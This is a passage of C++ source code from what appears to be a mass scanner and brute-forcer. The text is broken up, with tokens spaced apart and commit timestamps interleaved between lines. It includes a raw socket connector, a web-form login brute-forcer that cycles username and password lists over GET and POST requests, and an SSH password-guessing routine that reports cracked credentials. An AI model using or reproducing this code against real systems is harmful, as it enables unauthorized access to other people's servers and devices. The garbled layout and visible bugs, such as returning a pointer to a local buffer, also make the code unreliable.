CSTR - > size = 0 ;
return 0 ;
} ;
} ;
} ;
2014-09-19 19:27:28 +00:00
stt - > doEmitionRedFoundData ( " SSL(InitCTX). " ) ;
2014-09-07 18:54:46 +00:00
return - 1 ;
} ;
int Connector : : _EstablishSSLConnection ( char * iph , int porth , char * requesth , conSTR * CSTR )
{
return _sslConnectTo ( iph , porth , requesth , CSTR ) ;
} ;
void __deleteExcessiveNullBytes ( char * buff , int sz )
{
int j = 0 ;
for ( int i = 0 ; i < sz - 1 ; + + i )
{
if ( buff [ i ] ! = 0 ) buff [ j + + ] = buff [ i ] ;
} ;
} ;
struct linger linger = { 0 } ;
2014-11-22 16:22:24 +00:00
int Connector : : _EstablishConnection ( char * ip , int port , char * request , conSTR * CSTR , int force )
2014-09-07 18:54:46 +00:00
{
CSTR - > lowerBuff = NULL ;
if ( strlen ( ip ) = = 0 )
{
2014-09-19 19:27:28 +00:00
stt - > doEmitionDebugFoundData ( " [<a href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " / \" ><font color= \" #0084ff \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </font></a> " + " ] Rejecting in _connection: Bad IP. " ) ;
2014-09-07 18:54:46 +00:00
return - 1 ;
} ;
if ( port < 0 | | port > 65535 )
{
2014-09-19 19:27:28 +00:00
stt - > doEmitionDebugFoundData ( " [<a href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " / \" ><font color= \" #0084ff \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </font></a> " + " ] Rejecting in _connection: Bad port. " ) ;
2014-09-07 18:54:46 +00:00
return - 1 ;
} ;
char * recvBuff2 = NULL ;
sockaddr_in sockAddr ;
sockAddr . sin_family = AF_INET ;
sockAddr . sin_port = htons ( port ) ;
HOSTENT * host ;
# if defined(WIN32)
if ( inet_addr ( ip ) ! = INADDR_NONE ) sockAddr . sin_addr . S_un . S_addr = inet_addr ( ip ) ;
# else
if ( inet_addr ( ip ) ! = INADDR_NONE ) sockAddr . sin_addr . s_addr = inet_addr ( ip ) ;
2014-10-19 10:39:27 +00:00
# endif
else if ( host = gethostbyname ( ip ) ) ( ( unsigned long * ) & sockAddr . sin_addr ) [ 0 ] = ( ( unsigned long * * ) host - > h_addr_list ) [ 0 ] [ 0 ] ;
2014-09-07 18:54:46 +00:00
else
{
2014-09-19 19:27:28 +00:00
+ + offlines ;
2014-10-19 10:39:27 +00:00
if ( host = = NULL ) return - 2 ;
else return - 1 ;
2014-09-07 18:54:46 +00:00
} ;
SOCKET sock = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
while ( sock = = INVALID_SOCKET )
{
2014-11-22 16:22:24 +00:00
stt - > doEmitionRedFoundData ( " [Cannot create socket] " ) ;
2014-09-07 18:54:46 +00:00
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
Sleep ( 500 ) ;
sock = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
} ;
2014-11-22 16:22:24 +00:00
while ( WSAGetLastError ( ) = = 10038 )
2014-09-07 18:54:46 +00:00
{
2014-11-22 16:22:24 +00:00
if ( gDebugMode ) stt - > doEmitionDebugFoundData ( " 10038 occured - [ " + QString ( ip ) + " : " + QString : : number ( port ) + " ] " ) ;
2014-09-07 18:54:46 +00:00
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
sock = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
} ;
# if defined(WIN32)
u_long FAR cmd = 1 ;
if ( ioctlsocket ( sock , FIONBIO , & cmd ) ! = 0 )
# else
if ( fcntl ( sock , F_SETFL , O_NDELAY ) = = - 1 )
# endif
{
2014-11-22 16:22:24 +00:00
stt - > doEmitionRedFoundData ( " [FIONBIO failed] " ) ;
} ;
int recvBuffSize = 0 ;
2014-09-07 18:54:46 +00:00
int on = 1 ;
2014-11-22 16:22:24 +00:00
linger . l_onoff = 0 ;
linger . l_linger = 10 ;
2014-09-19 19:27:28 +00:00
setsockopt ( sock , SOL_SOCKET , SO_REUSEADDR , ( const char * ) & on , sizeof ( on ) ) ;
setsockopt ( sock , SOL_SOCKET , SO_LINGER , ( const char * ) & linger , sizeof ( linger ) ) ;
2014-11-22 16:22:24 +00:00
fd_set read_fs ;
FD_ZERO ( & read_fs ) ;
FD_SET ( sock , & read_fs ) ;
2014-09-07 18:54:46 +00:00
int iError , iResult = connect ( sock , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
2014-11-22 16:22:24 +00:00
2014-09-07 18:54:46 +00:00
if ( iResult = = SOCKET_ERROR )
{
iError = WSAGetLastError ( ) ;
while ( iError = = 10038 )
{
2014-11-22 16:22:24 +00:00
if ( gDebugMode ) stt - > doEmitionDebugFoundData ( " 10038 occured - [ " + QString ( ip ) + " : " + QString : : number ( port ) + " ] " ) ;
2014-09-07 18:54:46 +00:00
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
sock = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
iResult = connect ( sock , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
iError = WSAGetLastError ( ) ;
} ;
2014-11-22 16:22:24 +00:00
2014-09-07 18:54:46 +00:00
if ( iError = = 10035 )
{
timeval tv = { gTimeOut , 0 } ;
2014-11-22 16:22:24 +00:00
iResult = select ( sock + 1 , NULL , & read_fs , NULL , & tv ) ;
2014-09-07 18:54:46 +00:00
2014-11-22 16:22:24 +00:00
int cErrCode ;
2014-09-19 19:27:28 +00:00
if ( iResult = = SOCKET_ERROR )
2014-09-07 18:54:46 +00:00
{
+ + offlines ;
2014-11-22 16:22:24 +00:00
stt - > doEmitionRedFoundData ( " [Omitting IP] Select error - " +
2014-11-23 18:32:50 +00:00
QString : : number ( cErrCode ) +
" - " + QString ( ip ) + " : " + QString : : number ( port ) ) ;
2014-09-07 18:54:46 +00:00
}
else
{
2014-09-19 19:27:28 +00:00
if ( ! iResult ) + + offlines ;
2014-09-07 18:54:46 +00:00
else
{
if ( send ( sock , request , strlen ( request ) , 0 ) ! = SOCKET_ERROR )
{
if ( MapWidgetOpened ) stt - > doEmitionAddOutData ( QString ( ip ) , QString ( request ) ) ;
Activity + = strlen ( request ) ;
char recvBuff [ 4096 ] = { 0 } ;
2014-09-19 19:27:28 +00:00
recvBuff2 = new char [ RECV_MAX_SIZE ] ;
ZeroMemory ( recvBuff2 , RECV_MAX_SIZE ) ;
2014-09-07 18:54:46 +00:00
int bTO ;
2014-11-22 16:22:24 +00:00
int x = 256 ;
2014-09-07 18:54:46 +00:00
while ( x > 0 )
{
2014-09-19 19:27:28 +00:00
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
x = recvWT ( sock , recvBuff , sizeof ( recvBuff ) , gTimeOut , & bTO ) ;
2014-09-07 18:54:46 +00:00
if ( x < = 0 ) break ;
Activity + = x ;
recvBuffSize + = x ;
2014-09-19 19:27:28 +00:00
if ( recvBuffSize > RECV_MAX_SIZE )
2014-09-07 18:54:46 +00:00
{
2014-09-19 19:27:28 +00:00
delete [ ] recvBuff2 ;
recvBuff2 = NULL ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-19 19:27:28 +00:00
+ + Overl ;
CSTR - > lowerBuff = new char [ 11 ] ;
strcpy ( CSTR - > lowerBuff , " [OVERFLOW] " ) ;
CSTR - > size = 10 ;
return 0 ;
2014-09-07 18:54:46 +00:00
} ;
2014-09-19 19:27:28 +00:00
strncat ( recvBuff2 , recvBuff , x ) ;
2014-09-07 18:54:46 +00:00
} ;
}
else
{
+ + offlines ;
2014-11-23 18:32:50 +00:00
stt - > doEmitionRedFoundData ( " Send error " + QString ( ip ) + " - " + QString : : number ( WSAGetLastError ( ) ) ) ;
2014-09-07 18:54:46 +00:00
} ;
} ;
} ;
}
else
{
+ + offlines ;
2014-11-22 16:22:24 +00:00
if ( iError = = 10055 )
2014-09-07 18:54:46 +00:00
{
2014-11-23 11:47:22 +00:00
stt - > doEmitionRedFoundData ( " [SOCKERR 10055] Connection pool depleted " + QString ( ip ) + " : " + QString : : number ( port ) ) ;
2014-09-07 18:54:46 +00:00
}
2014-11-22 16:22:24 +00:00
else if ( iError = = 10049 )
2014-09-07 18:54:46 +00:00
{
2014-11-22 16:22:24 +00:00
stt - > doEmitionRedFoundData ( " [ADDR_NOT_AVAIL] " + QString ( ip ) +
2014-11-23 18:32:50 +00:00
" : " + QString : : number ( port ) +
" - " + QString : : number ( iError ) ) ;
2014-09-07 18:54:46 +00:00
}
else
{
2014-11-22 16:22:24 +00:00
stt - > doEmitionRedFoundData ( " [Unpredictable error] " + QString ( ip ) +
2014-11-23 18:32:50 +00:00
" : " + QString : : number ( port ) +
" - " + QString : : number ( iError ) ) ;
2014-09-07 18:54:46 +00:00
} ;
} ;
}
else
{
2014-11-22 16:22:24 +00:00
stt - > doEmitionRedFoundData ( " [?!] Strange behavior detected - " +
2014-11-23 18:32:50 +00:00
QString : : number ( WSAGetLastError ( ) ) +
" - " + QString ( ip ) + " : " + QString : : number ( port ) ) ;
2014-09-07 18:54:46 +00:00
} ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
if ( globalScanFlag = = false & & force = = 0 )
{
if ( recvBuff2 ! = NULL ) delete [ ] recvBuff2 ;
recvBuff2 = NULL ;
return - 1 ;
} ;
if ( recvBuff2 ! = NULL & & recvBuffSize > 0 )
{
if ( MapWidgetOpened ) stt - > doEmitionAddIncData ( QString ( ip ) , QString ( recvBuff2 ) ) ;
CSTR - > lowerBuff = new char [ recvBuffSize + 1 ] ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( CSTR - > lowerBuff , recvBuffSize + 1 ) ;
2014-09-07 18:54:46 +00:00
CSTR - > size = recvBuffSize ;
strncpy ( CSTR - > lowerBuff , recvBuff2 , recvBuffSize ) ;
2014-09-19 19:27:28 +00:00
memset ( CSTR - > lowerBuff + recvBuffSize , ' \0 ' , 1 ) ;
2014-09-07 18:54:46 +00:00
delete [ ] recvBuff2 ;
recvBuff2 = NULL ;
2014-11-22 16:22:24 +00:00
if ( HTMLDebugMode ) _DebugWriteHTMLToFile ( request , CSTR - > lowerBuff ) ;
2014-09-07 18:54:46 +00:00
return 0 ;
}
else
{
if ( recvBuff2 ! = NULL ) delete [ ] recvBuff2 ;
recvBuff2 = NULL ;
return - 1 ;
} ;
} ;
# pragma region WF
lopaStr _WFBrut ( char * cookie , char * ip , int port , char * methodVal , char * actionVal , char * userVal , char * passVal , char * formVal )
{
lopaStr lps ;
ZeroMemory ( lps . login , sizeof ( lps . login ) ) ;
ZeroMemory ( lps . pass , sizeof ( lps . pass ) ) ;
ZeroMemory ( lps . other , sizeof ( lps . other ) ) ;
int cookieLen = strlen ( cookie ) ;
char b [ 16 ] = { 0 } ;
char request [ 2048 ] = { 0 } ;
char argData [ 256 ] = { 0 } ;
char recvBuffer [ 65536 ] = { 0 } ;
Connector con ;
conSTR CSTR ;
int cRes ;
int firstCycle = 0 ;
if ( strstri ( methodVal , " get " ) ! = NULL )
{
int passCounter = 1 ;
for ( int i = 0 ; i < MaxWFLogin ; + + i )
{
2014-09-19 19:27:28 +00:00
if ( globalScanFlag = = false ) break ;
2014-09-07 18:54:46 +00:00
for ( int j = firstCycle ; j < MaxWFPass ; + + j )
{
2014-09-19 19:27:28 +00:00
if ( globalScanFlag = = false ) break ;
2014-09-07 18:54:46 +00:00
CSTR . lowerBuff = NULL ;
CSTR . size = 0 ;
cRes = 0 ;
strcpy ( request , " GET " ) ;
strcat ( request , actionVal ) ;
strcat ( request , " ? " ) ;
strcat ( request , userVal ) ;
strcat ( request , " = " ) ;
strcat ( request , wfLoginLst [ i ] ) ;
strcat ( request , " & " ) ;
strcat ( request , passVal ) ;
strcat ( request , " = " ) ;
strcat ( request , wfPassLst [ j ] ) ;
strcat ( request , " HTTP/1.1 \r \n " ) ;
strcat ( request , " Host: " ) ;
strcat ( request , ip ) ;
2014-11-01 18:31:40 +00:00
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
strcat ( request , itoa ( port , tbuff , 10 ) ) ;
2014-09-07 18:54:46 +00:00
if ( cookieLen ! = 0 )
{
strcat ( request , " \r \n Cookie: " ) ;
strcat ( request , cookie ) ;
} ;
2014-09-09 00:36:46 +00:00
strcat ( request , " \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: us-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Connection: close " ) ;
2014-09-07 18:54:46 +00:00
strcat ( request , " \r \n \r \n " ) ;
if ( port = = 443 ) cRes = con . _EstablishSSLConnection ( ip , port , request , & CSTR ) ;
else cRes = con . _EstablishConnection ( ip , port , request , & CSTR ) ;
2014-11-03 12:15:34 +00:00
if ( BALogSwitched ) stt - > doEmitionBAData ( " Checked WF: " + QString ( ip ) + " : " + QString : : number ( port ) + " ; login/pass: " + QString ( wfLoginLst [ i ] ) + " : " + QString ( wfPassLst [ j ] ) + " ; - Progress: ( " + QString : : number ( ( passCounter / ( double ) ( MaxWFPass * MaxWFLogin ) ) * 100 ) . mid ( 0 , 4 ) + " %) " ) ;
+ + passCounter ;
2014-09-07 18:54:46 +00:00
if ( CSTR . lowerBuff ! = NULL )
{
if ( strstri ( CSTR . lowerBuff , " 501 not implemented " ) ! = NULL )
{
stt - > doEmitionRedFoundData ( " <a href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " \" ><font color= \" #c3c3c3 \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </font></a> - [WF]: 501 Not Implemented. " ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
if ( strstri ( CSTR . lowerBuff , " 404 not found " ) ! = NULL )
{
stt - > doEmitionRedFoundData ( " <a href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " \" ><font color= \" #c3c3c3 \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </font></a> - [WF]: 404 Not Found. " ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
if ( strstri ( CSTR . lowerBuff , " Access is Denied " ) = = NULL
& & strstri ( CSTR . lowerBuff , " Location: " ) = = NULL
& & strstri ( CSTR . lowerBuff , " Access forbidden " ) = = NULL
& & strstri ( CSTR . lowerBuff , " Authentication required " ) = = NULL
& & strstri ( CSTR . lowerBuff , " invalid " ) = = NULL
& & strstri ( CSTR . lowerBuff , " error " ) = = NULL
& & strstri ( CSTR . lowerBuff , " loginerr " ) = = NULL
& & strstri ( CSTR . lowerBuff , " passerr " ) = = NULL
& & strstri ( CSTR . lowerBuff , " passworderr " ) = = NULL
& & strstri ( CSTR . lowerBuff , " location.href " ) = = NULL
& & strstri ( CSTR . lowerBuff , " location.replace " ) = = NULL
& & strstri ( CSTR . lowerBuff , " top.location " ) = = NULL
& & strstri ( CSTR . lowerBuff , " error_status " ) = = NULL
& & strstri ( CSTR . lowerBuff , " 501 not implemented " ) = = NULL
& & strstri ( CSTR . lowerBuff , " http-equiv= \" refresh \" " ) = = NULL
& & strstri ( CSTR . lowerBuff , " http-equiv = \" refresh \" " ) = = NULL
& & strstri ( CSTR . lowerBuff , " busy " ) = = NULL
& & strstri ( CSTR . lowerBuff , " later " ) = = NULL
& & strstri ( CSTR . lowerBuff , " verification failed " ) = = NULL
& & strstri ( CSTR . lowerBuff , " 403 Forbidden " ) = = NULL
& & strstri ( CSTR . lowerBuff , formVal ) = = NULL
)
{
if ( i = = 0 )
{
2014-09-19 19:27:28 +00:00
ZeroMemory ( request , sizeof ( request ) ) ;
2014-09-07 18:54:46 +00:00
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
char pass [ 256 ] = { 0 } ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( pass , sizeof ( pass ) ) ;
2014-09-07 18:54:46 +00:00
strcpy ( pass , ip ) ;
strcat ( pass , " - Web Form password found: " ) ;
strcat ( pass , wfLoginLst [ i ] ) ;
strcat ( pass , " : " ) ;
strcat ( pass , wfPassLst [ j ] ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
# pragma region QTGUI_Area
stt - > doEmition_BAGreenData ( " [+] " + QString ( pass ) ) ;
# pragma endregion
strcpy ( lps . login , wfLoginLst [ i ] ) ;
strcpy ( lps . pass , wfPassLst [ j ] ) ;
return lps ;
} ;
}
else
{
2014-09-19 19:27:28 +00:00
ZeroMemory ( request , sizeof ( request ) ) ;
2014-09-07 18:54:46 +00:00
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
if ( i = = 0 ) + + i ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( request , sizeof ( request ) ) ;
2014-09-07 18:54:46 +00:00
} ;
firstCycle = 1 ;
} ;
}
else if ( strstri ( methodVal , " post " ) ! = NULL )
{
int passCounter = 1 ;
int firstCycle = 0 ;
for ( int i = 0 ; i < MaxWFLogin ; + + i )
{
2014-09-19 19:27:28 +00:00
if ( globalScanFlag = = false ) break ;
2014-09-07 18:54:46 +00:00
for ( int j = firstCycle ; j < MaxWFPass ; + + j )
{
2014-09-19 19:27:28 +00:00
if ( globalScanFlag = = false ) break ;
2014-09-07 18:54:46 +00:00
CSTR . lowerBuff = NULL ;
CSTR . size = 0 ;
cRes = 0 ;
strcpy ( argData , userVal ) ;
strcat ( argData , " = " ) ;
strcat ( argData , wfLoginLst [ i ] ) ;
strcat ( argData , " & " ) ;
strcat ( argData , passVal ) ;
strcat ( argData , " = " ) ;
strcat ( argData , wfPassLst [ j ] ) ;
strcpy ( request , " POST " ) ;
strcat ( request , actionVal ) ;
strcat ( request , " HTTP/1.1 \r \n " ) ;
strcat ( request , " Host: " ) ;
strcat ( request , ip ) ;
2014-11-01 18:31:40 +00:00
strcat ( request , " : " ) ;
char tbuff [ 16 ] = { 0 } ;
strcat ( request , itoa ( port , tbuff , 10 ) ) ;
2014-09-07 18:54:46 +00:00
if ( cookieLen ! = 0 )
{
strcat ( request , " \r \n Cookie: " ) ;
strcat ( request , cookie ) ;
} ;
2014-11-02 09:53:50 +00:00
strcat ( request , " \r \n Content-type: application/x-www-form-urlencoded \r \n Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 \r \n Accept-Language: us-US,ru;q=0.9,en;q=0.8 \r \n Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 \r \n Accept-Encoding: text, identity, *;q=0 \r \n User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 \r \n Connection: close \r \n Content-Length: " ) ;
2014-09-07 18:54:46 +00:00
strcat ( request , itoa ( strlen ( argData ) , b , 10 ) ) ;
strcat ( request , " \r \n \r \n " ) ;
strcat ( request , argData ) ;
2014-11-03 12:15:34 +00:00
if ( BALogSwitched ) stt - > doEmitionBAData ( " Checked WF: " + QString ( ip ) + " : " + QString : : number ( port ) + " ; login/pass: " + QString ( wfLoginLst [ i ] ) + " : " + QString ( wfPassLst [ j ] ) + " ; - Progress: ( " + QString : : number ( ( passCounter / ( double ) ( MaxWFPass * MaxWFLogin ) ) * 100 ) . mid ( 0 , 4 ) + " %) " ) ;
+ + passCounter ;
2014-09-07 18:54:46 +00:00
if ( port = = 443 ) cRes = con . _EstablishSSLConnection ( ip , port , request , & CSTR ) ;
else cRes = con . _EstablishConnection ( ip , port , request , & CSTR ) ;
if ( CSTR . lowerBuff ! = NULL )
{
if ( strstri ( CSTR . lowerBuff , " 501 not implemented " ) ! = NULL )
{
stt - > doEmitionRedFoundData ( " <a href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " \" ><font color= \" #c3c3c3 \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </font></a> - [WF]: 501 Not Implemented. " ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
if ( strstri ( CSTR . lowerBuff , " 404 not found " ) ! = NULL )
{
stt - > doEmitionRedFoundData ( " <a href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " \" ><font color= \" #c3c3c3 \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </font></a> - [WF]: 404 Not Found. " ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
if ( strstri ( CSTR . lowerBuff , " Access is Denied " ) = = NULL
& & strstri ( CSTR . lowerBuff , " Location: " ) = = NULL
& & strstri ( CSTR . lowerBuff , " Access forbidden " ) = = NULL
& & strstri ( CSTR . lowerBuff , " Authentication required " ) = = NULL
& & strstri ( CSTR . lowerBuff , " invalid " ) = = NULL
& & strstri ( CSTR . lowerBuff , " error " ) = = NULL
& & strstri ( CSTR . lowerBuff , " loginerr " ) = = NULL
& & strstri ( CSTR . lowerBuff , " passerr " ) = = NULL
& & strstri ( CSTR . lowerBuff , " passworderr " ) = = NULL
& & strstri ( CSTR . lowerBuff , " location.href " ) = = NULL
& & strstri ( CSTR . lowerBuff , " location.replace " ) = = NULL
& & strstri ( CSTR . lowerBuff , " top.location " ) = = NULL
& & strstri ( CSTR . lowerBuff , " error_status " ) = = NULL
& & strstri ( CSTR . lowerBuff , " http-equiv= \" refresh \" " ) = = NULL
& & strstri ( CSTR . lowerBuff , " http-equiv = \" refresh \" " ) = = NULL
& & strstri ( CSTR . lowerBuff , " busy " ) = = NULL
& & strstri ( CSTR . lowerBuff , " later " ) = = NULL
& & strstri ( CSTR . lowerBuff , " verification failed " ) = = NULL
& & strstri ( CSTR . lowerBuff , " 403 Forbidden " ) = = NULL
& & strstri ( CSTR . lowerBuff , formVal ) = = NULL
)
{
if ( i = = 0 )
{
2014-09-19 19:27:28 +00:00
ZeroMemory ( request , sizeof ( request ) ) ;
ZeroMemory ( argData , sizeof ( argData ) ) ;
2014-09-07 18:54:46 +00:00
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
char pass [ 256 ] = { 0 } ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( pass , sizeof ( pass ) ) ;
2014-09-07 18:54:46 +00:00
strcpy ( pass , ip ) ;
strcat ( pass , " - Web Form password found: " ) ;
strcat ( pass , wfLoginLst [ i ] ) ;
strcat ( pass , " : " ) ;
strcat ( pass , wfPassLst [ j ] ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
# pragma region QTGUI_Area
stt - > doEmition_BAGreenData ( " [+] " + QString ( pass ) ) ;
# pragma endregion
strcpy ( lps . login , wfLoginLst [ i ] ) ;
strcpy ( lps . pass , wfPassLst [ j ] ) ;
return lps ;
} ;
}
else
{
2014-09-19 19:27:28 +00:00
ZeroMemory ( request , sizeof ( request ) ) ;
ZeroMemory ( argData , sizeof ( argData ) ) ;
2014-09-07 18:54:46 +00:00
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
if ( i = = 0 ) + + i ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( request , sizeof ( request ) ) ;
ZeroMemory ( argData , sizeof ( argData ) ) ;
2014-09-07 18:54:46 +00:00
} ;
firstCycle = 1 ;
} ;
}
else
{
stt - > doEmitionFoundData ( " <a href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " \" ><font color= \" #c3c3c3 \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </font></a> - [WF]: Unknown method. " ) ;
} ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( request , sizeof ( request ) ) ;
ZeroMemory ( argData , sizeof ( argData ) ) ;
2014-09-07 18:54:46 +00:00
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
lopaStr Connector : : _WFLobby ( char * cookie , char * ip , int port , char * methodVal , char * actionVal , char * userVal , char * passVal , char * formVal )
{
while ( BrutingThrds > = gMaxBrutingThreads ) Sleep ( 700 ) ;
+ + WF ;
BConInc ( ) ;
lopaStr res = _WFBrut ( cookie , ip , port , methodVal , actionVal , userVal , passVal , formVal ) ;
BConDec ( ) ;
return res ;
} ;
# pragma endregion
# pragma region SSH
2014-09-19 19:27:28 +00:00
int _sshConnect ( char * user , char * pass , char * host , int port )
2014-09-07 18:54:46 +00:00
{
char hostStr [ 128 ] = { 0 } ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( hostStr , sizeof ( hostStr ) ) ;
2014-09-07 18:54:46 +00:00
strcpy ( hostStr , user ) ;
strcat ( hostStr , " @ " ) ;
strcat ( hostStr , host ) ;
ssh_session my_ssh_session = ssh_new ( ) ;
if ( my_ssh_session = = NULL )
{
ssh_free ( my_ssh_session ) ;
return - 1 ;
} ;
ssh_options_set ( my_ssh_session , SSH_OPTIONS_HOST , hostStr ) ;
2014-09-19 19:27:28 +00:00
ssh_options_set ( my_ssh_session , SSH_OPTIONS_PORT , & port ) ;
2014-09-07 18:54:46 +00:00
//ssh_options_set(my_ssh_session, SSH_OPTIONS_LOG_VERBOSITY, &verbosity);
//ssh_options_set(my_ssh_session, SSH_OPTIONS_LOG_VERBOSITY_STR, &verbosity);
//ssh_options_set(my_ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0);
int sshTimeout = gTimeOut + 1 ;
ssh_options_set ( my_ssh_session , SSH_OPTIONS_TIMEOUT , & sshTimeout ) ;
int rc = ssh_connect ( my_ssh_session ) ;
if ( rc ! = SSH_OK )
{
ssh_disconnect ( my_ssh_session ) ;
ssh_free ( my_ssh_session ) ;
+ + offlines ;
return - 2 ;
}
else
{
rc = ssh_userauth_password ( my_ssh_session , NULL , pass ) ;
if ( rc ! = SSH_AUTH_SUCCESS )
{
ssh_disconnect ( my_ssh_session ) ;
ssh_free ( my_ssh_session ) ;
return - 1 ;
} ;
} ;
ssh_disconnect ( my_ssh_session ) ;
ssh_free ( my_ssh_session ) ;
+ + ssh ;
return 0 ;
} ;
2014-09-19 19:27:28 +00:00
char * _get_ssh_banner ( char * ip , int port )
2014-09-07 18:54:46 +00:00
{
Connector con ;
conSTR CSTR ;
char recvBuff [ 256 ] = { 0 } ;
2014-09-19 19:27:28 +00:00
con . _EstablishConnection ( ip , port , " " , & CSTR ) ;
2014-09-07 18:54:46 +00:00
if ( CSTR . lowerBuff ! = NULL & & CSTR . size ! = 0 )
{
strncpy ( recvBuff , CSTR . lowerBuff , CSTR . size < 256 ? CSTR . size : 256 ) ;
} ;
if ( CSTR . lowerBuff ! = NULL )
{
delete [ ] CSTR . lowerBuff ;
CSTR . lowerBuff = NULL ;
} ;
return recvBuff ;
} ;
2014-09-19 19:27:28 +00:00
int check_ssh_pass ( char * user , char * pass , char * userPass , char * host , int port , conSTR * CSTR , char * banner )
2014-09-07 18:54:46 +00:00
{
int res = - 1 ;
2014-09-19 19:27:28 +00:00
if ( BALogSwitched ) stt - > doEmitionBAData ( " Probing SSH: " + QString ( user ) + " : " + QString ( pass ) + " @ " + QString ( host ) + " : " + QString : : number ( port ) ) ;
res = _sshConnect ( user , pass , host , port ) ;
2014-09-07 18:54:46 +00:00
if ( res = = 0 )
{
stt - > doEmition_BAGreenData ( " [+] SSH: " + QString ( user ) + " : " + QString ( pass ) + " @ " + QString ( host ) ) ;
char goodStr [ 512 ] = { 0 } ;
strcpy ( goodStr , userPass ) ;
strcat ( goodStr , " @ " ) ;
strcat ( goodStr , host ) ;
strcat ( goodStr , " |+| " ) ;
strcat ( goodStr , banner ) ;
int bsz = strlen ( goodStr ) ;
CSTR - > lowerBuff = new char [ bsz + 1 ] ;
ZeroMemory ( CSTR - > lowerBuff , sizeof ( CSTR - > lowerBuff ) ) ;
CSTR - > size = bsz ;
strncpy ( CSTR - > lowerBuff , goodStr , bsz ) ;
memset ( CSTR - > lowerBuff + bsz , ' \0 ' , 1 ) ;
return 0 ;
} ;
return res ;
} ;
2014-09-19 19:27:28 +00:00
int _EstablishSSHConnection ( char * host , int port , conSTR * CSTR , char * banner )
2014-09-07 18:54:46 +00:00
{
CSTR - > lowerBuff = NULL ;
CSTR - > size = 0 ;
char login [ 32 ] = { 0 } ;
char pass [ 32 ] = { 0 } ;
char temp [ 64 ] = { 0 } ;
2014-10-26 15:05:51 +00:00
isActive = 1 ;
2014-09-07 18:54:46 +00:00
SSHConInc ( ) ;
int sz = 0 ;
char * ptr1 = 0 ;
int res = - 1 ;
for ( int i = 0 ; i < MaxSSHPass ; + + i )
{
